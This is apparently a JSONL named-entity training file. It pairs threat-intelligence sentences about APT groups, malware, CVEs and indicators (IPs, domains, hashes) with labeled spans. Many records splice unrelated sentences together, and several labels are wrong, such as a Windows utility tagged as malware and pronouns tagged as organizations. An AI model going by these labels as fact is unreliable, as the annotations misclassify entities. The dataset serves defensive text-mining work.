{"text": "We observed DDKONG in use between February 2017 and the present , while PLAINTEE is a newer addition with the earliest known sample being observed in October 2017 . Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia .", "spans": {"TOOL: DDKONG": [[12, 18]], "TOOL: PLAINTEE": [[72, 80]], "THREAT_ACTOR: groups": [[171, 177]], "THREAT_ACTOR: Buhtrap": [[188, 195]], "MALWARE: Corkow": [[198, 204]], "THREAT_ACTOR: Carbanak": [[209, 217]], "ORGANIZATION: financial institutions": [[283, 305]], "ORGANIZATION: customers": [[316, 325]]}, "info": {"id": "cyberner_stix_train_002914", "source": "cyberner_stix_train"}}
{"text": "Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos ’ approaches with respect to the “ TRITON actor ” comes down to fundamental philosophical differences in methodology .", "spans": {"ORGANIZATION: FireEye": [[241, 248]], "ORGANIZATION: Dragos": [[253, 259]], "MALWARE: TRITON": [[295, 301]]}, "info": {"id": "cyberner_stix_train_002915", "source": "cyberner_stix_train"}}
{"text": "The malware authors seem to be putting a lot of effort into improving this malware , bundling it with numerous new upgrades that make it more sophisticated , evasive , and well-equipped . In a recent report , the FBI’s Internet Crime Complaint Center (IC3) reported that more than 20 , 000 businesses lost nearly $1.3 billion to BEC attacks in 2018 . Variants of malware and tools used by HIDDEN COBRA actors include Destover and Hangman .", "spans": {"ORGANIZATION: FBI’s": [[213, 218]], "ORGANIZATION: businesses": [[290, 300]], "THREAT_ACTOR: HIDDEN COBRA actors": [[389, 408]], "MALWARE: Destover": [[417, 425]], "MALWARE: Hangman": [[430, 437]]}, "info": {"id": "cyberner_stix_train_002916", "source": "cyberner_stix_train"}}
{"text": "A separate malicious executable – 2DE25306A58D8A5B6CBE8D5E2FC5F3C5 ( vlc.exe ) – runs when the photograph is displayed , using the YouTube icon and calling out to several URLs on windowsnewupdates.com .", "spans": {"FILEPATH: 2DE25306A58D8A5B6CBE8D5E2FC5F3C5": [[34, 66]], "FILEPATH: vlc.exe": [[69, 76]], "TOOL: YouTube icon": [[131, 143]], "DOMAIN: windowsnewupdates.com": [[179, 200]]}, "info": {"id": "cyberner_stix_train_002917", "source": "cyberner_stix_train"}}
{"text": "aux.robertstockdill.com kumar.pari@yandex.com Unknown April 1 , 2014 . ssl.2upgrades.com kumar.pari@yandex.com 176.58.96.234 July 5 , 2014 . bss.pvtcdn.com registrar@mail.zgsj.com 106.184.1.38 May 19 , 2015 .", "spans": {"DOMAIN: aux.robertstockdill.com": [[0, 23]], "EMAIL: kumar.pari@yandex.com": [[24, 45], [89, 110]], "DOMAIN: ssl.2upgrades.com": [[71, 88]], "IP_ADDRESS: 176.58.96.234": [[111, 124]], "DOMAIN: bss.pvtcdn.com": [[141, 155]], "EMAIL: registrar@mail.zgsj.com": [[156, 179]], "IP_ADDRESS: 106.184.1.38": [[180, 192]]}, "info": {"id": "cyberner_stix_train_002918", "source": "cyberner_stix_train"}}
{"text": "In other cases , CozyDuke has been observed downloading and executing tools from other toolsets used by the Dukes such as OnionDuke , SeaDuke , and HammerDuke .", "spans": {"MALWARE: CozyDuke": [[17, 25]], "THREAT_ACTOR: Dukes": [[108, 113]], "MALWARE: OnionDuke": [[122, 131]], "MALWARE: SeaDuke": [[134, 141]], "MALWARE: HammerDuke": [[148, 158]]}, "info": {"id": "cyberner_stix_train_002919", "source": "cyberner_stix_train"}}
{"text": "cmstp.exe system restart , cmstp.exe will be used to execute the SCT file indirectly through the INF file . Ploutus-D will load KXCashDispenserLib” library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) .", "spans": {"MALWARE: cmstp.exe": [[0, 9], [27, 36]], "MALWARE: SCT file": [[65, 73]], "MALWARE: INF file": [[97, 105]], "FILEPATH: Ploutus-D": [[108, 117]], "FILEPATH: (K3A.Platform.dll)": [[190, 208]]}, "info": {"id": "cyberner_stix_train_002920", "source": "cyberner_stix_train"}}
{"text": "The concurrent use of so many tools during a single intrusion suggests that the group could include threat actors with distinct tactics , roles , and tool preferences .", "spans": {}, "info": {"id": "cyberner_stix_train_002921", "source": "cyberner_stix_train"}}
{"text": "As an example , we might see extraneous data in their SSL / TLS certificates that give away information about their provider or resources .", "spans": {}, "info": {"id": "cyberner_stix_train_002922", "source": "cyberner_stix_train"}}
{"text": "In previous cases , the group used their malware toolsets interchangeably , as either the initial or a later-stage toolset in a campaign .", "spans": {}, "info": {"id": "cyberner_stix_train_002923", "source": "cyberner_stix_train"}}
{"text": "( deprecated in API level 21 ) SYSTEM_ALERT_WINDOW - Allows the application to create windows shown on top of all other apps . Banks in countries such as Russia , the United Kingdom , the Netherlands , Spain , Romania , Belarus , Poland , Estonia , Bulgaria , Georgia , Moldova , Kyrgyzstan , Armenia , Taiwan and Malaysia have allegedly been targeted with spearphishing emails , luring victims into clicking malicious URLs and executing booby-trapped documents . Beginning in early March 2018 , Unit 42 started observing targeted attacks against Russian , Spanish and United States government agencies operating in Pakistan .", "spans": {"ORGANIZATION: Banks": [[127, 132]], "MALWARE: spearphishing emails": [[357, 377]], "ORGANIZATION: Unit 42": [[496, 503]], "ORGANIZATION: government agencies": [[583, 602]]}, "info": {"id": "cyberner_stix_train_002924", "source": "cyberner_stix_train"}}
{"text": "NATO and EU member countries , as well as the United States , are of particular interest to the group .", "spans": {"ORGANIZATION: NATO": [[0, 4]], "ORGANIZATION: EU": [[9, 11]], "ORGANIZATION: United States": [[46, 59]]}, "info": {"id": "cyberner_stix_train_002925", "source": "cyberner_stix_train"}}
{"text": "SMS Billing Carriers may partner with vendors to allow users to pay for services by SMS . Their targets are marine companies that operate in and around the South China Sea , an area of much Chinese interest . Help / ? Get help . Mandiant identified novel operational technology ( OT ) / industrial control system ( ICS)-oriented malware , which we track as COSMICENERGY , uploaded to a public malware scanning utility in December 2021 by a submitter in Russia .", "spans": {"ORGANIZATION: marine companies": [[108, 124]], "ORGANIZATION: Mandiant": [[229, 237]], "MALWARE: novel operational technology ( OT ) / industrial control system ( ICS)-oriented malware": [[249, 336]], "MALWARE: COSMICENERGY": [[357, 369]], "TOOL: public malware scanning utility": [[386, 417]]}, "info": {"id": "cyberner_stix_train_002926", "source": "cyberner_stix_train"}}
{"text": "From early 2018 prior to May , “ Agent Smith ” hackers started to experiment with Bundle Feng Shui , the key tool which gives “ Agent Smith ” malware family capabilities to infect innocent apps on the device . Patchwork uses email as an entry point , which is why securing the email gateway is important . As mentioned , given the complexity of the attack chain and of Dexphot ’s persistence methods , we released a remediation solution that prevents re-infection by removing artifacts . Furthermore , as system and web server logs may have time or size limits enforced , we recommend preserving the following artifacts for forensic analysis : • At least 14 days of HTTP web logs from the directories ( include logs from all subdirectories ) •", "spans": {"MALWARE: Agent Smith": [[33, 44], [128, 139]], "THREAT_ACTOR: Patchwork": [[210, 219]], "MALWARE: Dexphot": [[369, 376]], "SYSTEM: system and web server logs": [[505, 531]]}, "info": {"id": "cyberner_stix_train_002927", "source": "cyberner_stix_train"}}
{"text": "Versions overview The DenDroid code base was kept to such an extent that even the original base64-encoded password was kept . From September 2016 through late November 2016 , a threat actor group used both the Trochilus RAT and a newly idenfied RAT we've named MoonWind to target organizations in Thailand , including a utility organization . Similar to RIPTIDE and HIGHTIDE , the WATERSPOUT backdoor is an HTTP based backdoor that communicates with its C2 server . Enterprise T1199 Trusted Relationship APT29 has compromised IT , cloud services , and managed services providers to gain broad access to multiple customers for subsequent operations .", "spans": {"MALWARE: DenDroid": [[22, 30]], "TOOL: Trochilus RAT": [[210, 223]], "TOOL: RAT": [[245, 248]], "TOOL: MoonWind": [[261, 269]], "ORGANIZATION: utility organization": [[320, 340]], "MALWARE: RIPTIDE": [[354, 361]], "MALWARE: HIGHTIDE": [[366, 374]], "MALWARE: WATERSPOUT backdoor": [[381, 400]], "TOOL: C2": [[454, 456]], "THREAT_ACTOR: Trusted Relationship APT29": [[483, 509]], "SYSTEM: IT": [[526, 528]], "SYSTEM: cloud services": [[531, 545]], "SYSTEM: managed services providers": [[552, 578]]}, "info": {"id": "cyberner_stix_train_002928", "source": "cyberner_stix_train"}}
{"text": "Then , in early May ( two days after the last malware sample was submitted ) the Palestinian Authority held local elections in the West Bank which were reportedly seen as a test for the Fatah party .", "spans": {"ORGANIZATION: Palestinian Authority": [[81, 102]], "ORGANIZATION: Fatah party": [[186, 197]]}, "info": {"id": "cyberner_stix_train_002929", "source": "cyberner_stix_train"}}
{"text": "This has the same functionality as mcpef.apk . However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 . Primarily focused on governments and military operations of countries with interests in the South China Sea , Moafee likely chooses its targets based on region 's rich natural resources .", "spans": {"THREAT_ACTOR: Rocke": [[78, 83]], "VULNERABILITY: CVE-2018-1000861": [[152, 168]], "VULNERABILITY: CVE-2019-1003000": [[173, 189]], "ORGANIZATION: governments": [[213, 224]], "THREAT_ACTOR: Moafee": [[302, 308]]}, "info": {"id": "cyberner_stix_train_002930", "source": "cyberner_stix_train"}}
{"text": "“ Twitoor serves as another example of how cybercriminals keep on innovating their business , ” Stefanko continues . If Scattered Canary can be seen as a microcosm for the rapidly evolving organizations behind today’s most pernicious email scams , this report demonstrates that a much more holistic approach—one based on threat actor identity rather than type of fraudulent activity—is required to detect email fraud and protect organizations . We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia .", "spans": {"MALWARE: Twitoor": [[2, 9]], "THREAT_ACTOR: Scattered Canary": [[120, 136]]}, "info": {"id": "cyberner_stix_train_002931", "source": "cyberner_stix_train"}}
{"text": "Click fraud apps The authors ' tactics evolved from advertisement spam to real PHA ( Click Fraud ) . This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page . According to recent opinion polls , the Democratic Progressive Party ( DPP ) candidate Tsai Ing-wen is leading her opponents and is widely expected to win the election . Other Snort rules and detection content can prevent the execution of the malware used as the final payload .", "spans": {"MALWARE: .lnk file": [[154, 163]], "ORGANIZATION: Democratic Progressive Party": [[335, 363]], "ORGANIZATION: DPP": [[366, 369]]}, "info": {"id": "cyberner_stix_train_002932", "source": "cyberner_stix_train"}}
{"text": "On the technical side , since mid-January Kaspersky researchers have been tracking an active Turla campaign targeting government bodies in Turkmenistan and Tajikistan . We have not yet identified FIN7’s ultimate goal in this campaign , as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft .", "spans": {"ORGANIZATION: Kaspersky": [[42, 51]], "THREAT_ACTOR: Turla": [[93, 98]], "ORGANIZATION: government": [[118, 128]], "THREAT_ACTOR: FIN7’s": [[196, 202]], "FILEPATH: malicious emails": [[282, 298]]}, "info": {"id": "cyberner_stix_train_002933", "source": "cyberner_stix_train"}}
{"text": "It downloads one more archive and dynamically loads code from it . APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers .", "spans": {"THREAT_ACTOR: APT28": [[67, 72]], "VULNERABILITY: EternalBlue exploit": [[113, 132]], "TOOL: open source tool": [[141, 157]], "TOOL: Responder": [[158, 167]], "THREAT_ACTOR: Molerats": [[255, 263]], "ORGANIZATION: governmental": [[272, 284]], "ORGANIZATION: embassies": [[325, 334]], "ORGANIZATION: aerospace": [[356, 365]], "ORGANIZATION: defence Industries": [[370, 388]], "ORGANIZATION: financial institutions": [[391, 413]], "ORGANIZATION: journalists": [[416, 427]], "ORGANIZATION: software developers": [[430, 449]]}, "info": {"id": "cyberner_stix_train_002934", "source": "cyberner_stix_train"}}
{"text": "These files have the capability to download and install malware , install proxy and Remote Access Trojans ( RATs ) , connect to command and control ( C2 ) servers to receive additional instructions , and modify the victim 's firewall to allow incoming connections . Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand .", "spans": {"TOOL: RATs": [[108, 112]], "MALWARE: Bookworm": [[295, 303]]}, "info": {"id": "cyberner_stix_train_002935", "source": "cyberner_stix_train"}}
{"text": "Since 2011 , the robbers had allegedly been stealing money directly from bank accounts in Russia and other countries of the Commonwealth of Independent States ( CIS ) by using a Trojan called Lurk . TG-3390 sends spearphishing emails with ZIP archive attachments .", "spans": {"TOOL: Trojan": [[178, 184]], "TOOL: Lurk": [[192, 196]], "THREAT_ACTOR: TG-3390": [[199, 206]], "TOOL: emails": [[227, 233]]}, "info": {"id": "cyberner_stix_train_002936", "source": "cyberner_stix_train"}}
{"text": "It also appears the apps may still be in development or incubation , maybe waiting for a “ right time ” to inject the malicious codes . Recently Subaat drew our attention due to renewed targeted attack activity . but not least , Rhysida appears to have first popped up back in May , with several high - profile compromises posted on their leak site .", "spans": {"THREAT_ACTOR: Subaat": [[145, 151]], "MALWARE: Rhysida": [[229, 236]]}, "info": {"id": "cyberner_stix_train_002937", "source": "cyberner_stix_train"}}
{"text": "The organization appears to be shut down , but the threat actors are still very active . In the case of this malware , the activity groups strongly associated with Winnti are BARIUM and LEAD . The IXESHE attackers almost always make use of compromised servers as command-and-control ( C&C ) servers . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": {"TOOL: Winnti": [[164, 170]], "TOOL: BARIUM": [[175, 181]], "TOOL: LEAD": [[186, 190]], "THREAT_ACTOR: IXESHE": [[197, 203]], "TOOL: command-and-control": [[263, 282]], "TOOL: C&C": [[285, 288]], "MALWARE: FakeUpdates": [[368, 379]], "MALWARE: SocGholish": [[396, 406]]}, "info": {"id": "cyberner_stix_train_002938", "source": "cyberner_stix_train"}}
{"text": "This is done in the function initComponents . DLL hijacking techniques have been seen in the past with the APT15 group . The central directory it pertained to is the one in the second ZIP . But then , following an upsurge in attacks in the second half of 2014 , GReAT characterized MiniDuke , CosmicDuke and the actor ’s Nemesis Gemina project - targeting government , diplomatic , energy , military and telecom operators - as ‘ one of the world ’s most unusual APT operations ’ due to : • Its use of a customized backdoor written in Assembler using ‘ old school ’ virus writing techniques and habits • Stealthy transfer of updates as executables hidden inside GIF files ( a form of steganography )", "spans": {"THREAT_ACTOR: APT15 group": [[107, 118]], "ORGANIZATION: GReAT": [[262, 267]], "MALWARE: MiniDuke": [[282, 290]], "MALWARE: CosmicDuke": [[293, 303]], "ORGANIZATION: targeting government": [[346, 366]], "ORGANIZATION: diplomatic , energy , military and telecom operators": [[369, 421]]}, "info": {"id": "cyberner_stix_train_002939", "source": "cyberner_stix_train"}}
{"text": "Regardless of the agency or unit tasked with this collection , the upcoming US election , and the associated candidates and parties are of critical interest to both hostile and friendly nation states .", "spans": {}, "info": {"id": "cyberner_stix_train_002940", "source": "cyberner_stix_train"}}
{"text": "It also provides secure storage of passwords and other sensitive information .", "spans": {"ORGANIZATION: It": [[0, 2]]}, "info": {"id": "cyberner_stix_train_002941", "source": "cyberner_stix_train"}}
{"text": "More recently , we have also seen an increase in activity targeting Ukraine .", "spans": {}, "info": {"id": "cyberner_stix_train_002942", "source": "cyberner_stix_train"}}
{"text": "This indicates that multiple C2 servers were used in this campaign , but one ( 37.1.207.31 ) was the most heavily used . A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation . The malware is executed only for the following layout , the country is based on the Microsoft website : Cyberattacks can leave companies wondering how could this happen to us so , when these situations arise , it can help to know what might be motivating these attackers .", "spans": {"THREAT_ACTOR: OilRig group": [[179, 191]], "TOOL: QUADAGENT samples": [[201, 218]], "TOOL: Invoke-Obfuscation": [[281, 299]], "ORGANIZATION: Microsoft": [[386, 395]]}, "info": {"id": "cyberner_stix_train_002943", "source": "cyberner_stix_train"}}
{"text": "EventBot has the ability to update its library or potentially even download a second library when given a command from the C2 . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . Since at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a Cyber Espionage operation to collect information from defense , aerospace and petrochemical organizations .", "spans": {"MALWARE: EventBot": [[0, 8]], "VULNERABILITY: CVE-2017-11882": [[194, 208]], "MALWARE: 'NavShExt.dll'": [[275, 289]], "MALWARE: iexplore.exe": [[320, 332]], "ORGANIZATION: FireEye": [[465, 472]], "THREAT_ACTOR: APT33": [[483, 488]], "ORGANIZATION: defense": [[561, 568]], "ORGANIZATION: aerospace": [[571, 580]], "ORGANIZATION: petrochemical organizations": [[585, 612]]}, "info": {"id": "cyberner_stix_train_002944", "source": "cyberner_stix_train"}}
{"text": "The stolen data fields are : Mobile - The infected device phone number and contact ’ s phone number Contacts - A headline used for the attacker to distinguish between the type of stolen information he gets Name - Contact ’ s full name ( Display name ) upCon ( upload contact ) function used for stealing contact list information . We will provide an analysis of the HyperBro tool in an upcoming section . Large-scale cyber espionage campaigns such as \" GhostNet \" .", "spans": {"ORGANIZATION: We": [[331, 333]], "MALWARE: HyperBro": [[366, 374]]}, "info": {"id": "cyberner_stix_train_002945", "source": "cyberner_stix_train"}}
{"text": "Early in Q2 , Kaspersky identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems .", "spans": {"ORGANIZATION: Kaspersky": [[14, 23]], "THREAT_ACTOR: Lazarus": [[50, 57]], "ORGANIZATION: mobile gaming": [[77, 90]], "FILEPATH: files": [[182, 187]], "VULNERABILITY: exploit": [[188, 195]], "TOOL: Microsoft Office": [[211, 227]], "VULNERABILITY: CVE-2012-0158": [[244, 257]]}, "info": {"id": "cyberner_stix_train_002946", "source": "cyberner_stix_train"}}
{"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . Despite the fact that the Changing Information Technology Inc. certificate was revoked on July 4 , 2017 , the BlackTech group is still using it to sign their malicious tools .", "spans": {"MALWARE: CreateRemoteThread": [[192, 210]], "MALWARE: WriteProcessMemory": [[214, 232]]}, "info": {"id": "cyberner_stix_train_002947", "source": "cyberner_stix_train"}}
{"text": "The second division , overseen by Lieutenant Colonel Sergey Aleksandrovich Morgachev , managed the development and maintenance of malware and hacking tools used by Unit 26165 , including the X-Agent \" implant \" .", "spans": {"THREAT_ACTOR: Unit 26165": [[164, 174]], "MALWARE: X-Agent": [[191, 198]]}, "info": {"id": "cyberner_stix_train_002948", "source": "cyberner_stix_train"}}
{"text": "Those who already have read our previous articles about Zebrocy will notice that more or less the same kind of information is sent , over and over again by previous stages .", "spans": {"MALWARE: Zebrocy": [[56, 63]]}, "info": {"id": "cyberner_stix_train_002949", "source": "cyberner_stix_train"}}
{"text": "Both the client and the server use the same code to serialize and encrypt the communications .", "spans": {"TOOL: server": [[24, 30]]}, "info": {"id": "cyberner_stix_train_002950", "source": "cyberner_stix_train"}}
{"text": "Running successful big game hunting operations results in a higher average profit per victim , allowing adversaries like PINCHY SPIDER and their partners to increase their criminal revenue quickly . Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from .", "spans": {"ORGANIZATION: Symantec": [[291, 299]]}, "info": {"id": "cyberner_stix_train_002951", "source": "cyberner_stix_train"}}
{"text": "The documents that exploit CVE2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe . However , full details on ALLANITE and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView .", "spans": {"VULNERABILITY: CVE2017-11882": [[27, 40]], "TOOL: HTML Application": [[71, 87]], "MALWARE: HTA": [[90, 93]], "MALWARE: mshta.exe": [[223, 232]], "ORGANIZATION: Dragos WorldView": [[377, 393]]}, "info": {"id": "cyberner_stix_train_002952", "source": "cyberner_stix_train"}}
{"text": "Among multiple sub-domains , “ ad.a * * * d.org ” and “ gd.a * * * d.org ” both historically resolved to the same suspicious IP address . Once an exploitable page is identified , Clever Kitten will attempt to upload a PHP backdoor to gain remote access to the system . The monitoring components also detect freshly launched cmd.exe processes and terminate them promptly . In response to this activity , we built threat hunting campaigns designed to identify additional Exchange Server abuse .", "spans": {"FILEPATH: cmd.exe": [[324, 331]]}, "info": {"id": "cyberner_stix_train_002953", "source": "cyberner_stix_train"}}
{"text": "The Sofacy group remains a persistent global threat .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]]}, "info": {"id": "cyberner_stix_train_002954", "source": "cyberner_stix_train"}}
{"text": "PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . Hackers target primarily companies in Russia and CIS countries , though it is noticed that the amount of attacks targeting the USA has increased 5 times since 2011 .", "spans": {"MALWARE: PlugX": [[0, 5]], "ORGANIZATION: primarily companies": [[225, 244]]}, "info": {"id": "cyberner_stix_train_002955", "source": "cyberner_stix_train"}}
{"text": "] com , 31.214.157 [ . China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of netstat an|find ESTABLISHED . First released in 2005 , the tool has gone unchanged since 2008 with v ersion 2.3.2 .", "spans": {"MALWARE: China Chopper": [[23, 36]]}, "info": {"id": "cyberner_stix_train_002956", "source": "cyberner_stix_train"}}
{"text": "More information on this threat actor is found in our report , APT37 (Reaper): The Overlooked North Korean Actor . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings .", "spans": {"THREAT_ACTOR: APT37": [[63, 68]], "FILEPATH: flare-qdb": [[133, 142]]}, "info": {"id": "cyberner_stix_train_002957", "source": "cyberner_stix_train"}}
{"text": "Figure 2 . To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability . The samples we have analyzed were actually quite large , each of them about 60 MB . In terms of detection , organizations should look to align their detection strategy with the MITRE ATTCK Framework to help detect a ransomware attack before its too late .", "spans": {"VULNERABILITY: CVE-2017-11882": [[250, 264]]}, "info": {"id": "cyberner_stix_train_002958", "source": "cyberner_stix_train"}}
{"text": "Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization 's vertical or demographic to increase the likelihood of finding victims with relevant information . Intelligence suggests the group has been active since at least 2014 and is presently operating in multiple facilities targeting safety systems beyond Triconex .", "spans": {"THREAT_ACTOR: TG-3390": [[26, 33]], "TOOL: SWCs": [[71, 75]]}, "info": {"id": "cyberner_stix_train_002959", "source": "cyberner_stix_train"}}
{"text": "Google Cloud Messaging is designed to send short message ( up to 4 KB ) to mobile devices via Google services . Thrip seemed to be mainly interested in the operational side of the company . Using this module by default indicates that the attackers are interested in stealing information from the victims ’ machines . Who is The Chaos Creator , and what else transpired between Harrison and Ashley Madison prior to his death ?", "spans": {"SYSTEM: Google Cloud Messaging": [[0, 22]], "ORGANIZATION: Google": [[94, 100]], "ORGANIZATION: The Chaos Creator": [[324, 341]], "ORGANIZATION: Harrison": [[377, 385]], "ORGANIZATION: Ashley Madison": [[390, 404]]}, "info": {"id": "cyberner_stix_train_002960", "source": "cyberner_stix_train"}}
{"text": "For each mounted drive , Ryuk calls GetDriveTypeW to determine the drive 's type . ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": {"TOOL: Ryuk": [[25, 29]], "TOOL: GetDriveTypeW": [[36, 49]], "THREAT_ACTOR: ScarCruft": [[83, 92]]}, "info": {"id": "cyberner_stix_train_002961", "source": "cyberner_stix_train"}}
{"text": "Data collected by Secureworks incident response ( IR ) analysts and analyzed by CTU researchers indicates that GOLD LOWELL extorts money from victims using the custom SamSam ransomware . SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire .", "spans": {"ORGANIZATION: Secureworks": [[18, 29]], "ORGANIZATION: CTU": [[80, 83]], "THREAT_ACTOR: GOLD LOWELL": [[111, 122]], "TOOL: SamSam": [[167, 173]], "ORGANIZATION: SPEAR": [[187, 192]], "MALWARE: PassCV samples": [[211, 225]], "MALWARE: RAT": [[286, 289]], "MALWARE: Netwire": [[297, 304]]}, "info": {"id": "cyberner_stix_train_002962", "source": "cyberner_stix_train"}}
{"text": "A shared supplier of malware would explain the overlap in tools , but it would not explain the significant overlap we have also observed in operational techniques related to command and control infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_train_002963", "source": "cyberner_stix_train"}}
{"text": "ChinaChopper web shell — A web-based executable script that allows a threat actor to execute commands on the compromised system .", "spans": {"MALWARE: ChinaChopper": [[0, 12]], "TOOL: web shell": [[13, 22]]}, "info": {"id": "cyberner_stix_train_002964", "source": "cyberner_stix_train"}}
{"text": "Paladin RAT is another remote administration tool used by the Pitty Tiger group . The first attack in the US that Group-IB attributes to this group was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal .", "spans": {"TOOL: Paladin RAT": [[0, 11]], "THREAT_ACTOR: Pitty Tiger group": [[62, 79]], "ORGANIZATION: Group-IB": [[114, 122]], "ORGANIZATION: bank": [[212, 216]]}, "info": {"id": "cyberner_stix_train_002965", "source": "cyberner_stix_train"}}
{"text": "It uses a variety of new techniques , but the most interesting thing is that it injects malicious code into the system libraries – libdmv.so or libandroid_runtime.so . Metel is a banking Trojan ( also known as Corkow ) discovered in 2011 when it was used to attack users of online banking services . In the initial versions , back in 2016 , the downloaded files from RevengeHotels campaigns were divided into two modules : a backdoor and a module to capture screenshots . Local investigators later confirmed that the energy outage was caused by a cyberattack .", "spans": {"TOOL: Metel": [[168, 173]], "TOOL: banking Trojan": [[179, 193]], "THREAT_ACTOR: Corkow": [[210, 216]], "THREAT_ACTOR: RevengeHotels": [[367, 380]], "MALWARE: backdoor": [[425, 433]], "ORGANIZATION: Local investigators": [[472, 491]], "THREAT_ACTOR: cyberattack": [[547, 558]]}, "info": {"id": "cyberner_stix_train_002966", "source": "cyberner_stix_train"}}
{"text": "PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload . We used a combination of tools such as NoFuserEx , ConfuserEx Fixer , ConfuserEx Switch Killer , and de4d0t in order to deobfuscate the code for in depth analysis .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]], "THREAT_ACTOR: NEODYMIUM": [[15, 24]], "VULNERABILITY: zero-day exploit": [[37, 53]], "MALWARE: NoFuserEx": [[146, 155]], "MALWARE: ConfuserEx Fixer": [[158, 174]], "MALWARE: ConfuserEx Switch Killer": [[177, 201]], "MALWARE: de4d0t": [[208, 214]]}, "info": {"id": "cyberner_stix_train_002967", "source": "cyberner_stix_train"}}
{"text": "One plausible reason for developing such a flexible malware might be that the group were increasingly encountering victim environments where users were using Linux as their desktop operating system .", "spans": {"SYSTEM: Linux": [[158, 163]]}, "info": {"id": "cyberner_stix_train_002968", "source": "cyberner_stix_train"}}
{"text": "The domain was active on the IP 213.251.187.145 from July 2014 up until March 2015 .", "spans": {"IP_ADDRESS: 213.251.187.145": [[32, 47]]}, "info": {"id": "cyberner_stix_train_002969", "source": "cyberner_stix_train"}}
{"text": "It is deployed to internally accessible servers running Internet Information Services ( IIS ) .", "spans": {"TOOL: Internet Information Services": [[56, 85]], "TOOL: IIS": [[88, 91]]}, "info": {"id": "cyberner_stix_train_002970", "source": "cyberner_stix_train"}}
{"text": "SHA256 : e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6 .", "spans": {"FILEPATH: e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6": [[9, 73]]}, "info": {"id": "cyberner_stix_train_002971", "source": "cyberner_stix_train"}}
{"text": "This lead us to estimate there to be over 2.8 billion infections in total , on around 25 Million unique devices , meaning that on average , each victim would have suffered roughly 112 swaps of innocent applications . Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor . This makes the system process running malicious code a literal moving target . For our Managed Defense Customers , we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity .", "spans": {"ORGANIZATION: Linux computers": [[310, 325]], "ORGANIZATION: Managed Defense Customers": [[464, 489]], "THREAT_ACTOR: threat actor": [[581, 593]]}, "info": {"id": "cyberner_stix_train_002972", "source": "cyberner_stix_train"}}
{"text": "Through their recent investigations , our forensics analysts pinpointed the initial compromise vector and post-compromise operations that led to the deployment of the destructive Shamoon malware on targeted infrastructures .", "spans": {"MALWARE: Shamoon": [[179, 186]]}, "info": {"id": "cyberner_stix_train_002973", "source": "cyberner_stix_train"}}
{"text": "On September 15 and 19 , 2017 , Proofpoint detected and blocked spearphishing emails from this group targeting a US shipbuilding company and a US university research center with military ties . We analyzed the webpage and found attackers injecting a script into the webpage .", "spans": {"ORGANIZATION: Proofpoint": [[32, 42]], "THREAT_ACTOR: group": [[95, 100]], "ORGANIZATION: shipbuilding company": [[116, 136]], "ORGANIZATION: military": [[178, 186]]}, "info": {"id": "cyberner_stix_train_002974", "source": "cyberner_stix_train"}}
